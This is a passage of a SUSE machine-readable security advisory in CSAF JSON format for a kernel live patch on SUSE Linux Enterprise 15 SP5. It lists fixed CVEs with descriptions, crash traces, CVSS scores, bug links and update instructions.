"text": "Security update for the Linux Kernel (Live Patch 24 for SUSE Linux Enterprise 15 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.97 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2023-53257: wifi: mac80211: check S1G action frame size (bsc#1250730).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1000,SUSE-2026-999,SUSE-SLE-Module-Live-Patching-15-SP5-2026-999",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1000-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1000-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261000-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1000-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024902.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1250730",
"url": "https://bugzilla.suse.com/1250730"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53257 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 24 for SUSE Linux Enterprise 15 SP5)",
"tracking": {
"current_release_date": "2026-03-25T07:08:02Z",
"generator": {
"date": "2026-03-25T07:08:02Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1000-1",
"initial_release_date": "2026-03-25T07:08:02Z",
"revision_history": [
{
"date": "2026-03-25T07:08:02Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_94-default-16-150500.2.2.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2023-53257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: check S1G action frame size\n\nBefore checking the action code, check that it even\nexists in the frame.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53257",
"url": "https://www.suse.com/security/cve/CVE-2023-53257"
},
{
"category": "external",
"summary": "SUSE Bug 1249869 for CVE-2023-53257",
"url": "https://bugzilla.suse.com/1249869"
},
{
"category": "external",
"summary": "SUSE Bug 1250730 for CVE-2023-53257",
"url": "https://bugzilla.suse.com/1250730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2023-53257"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
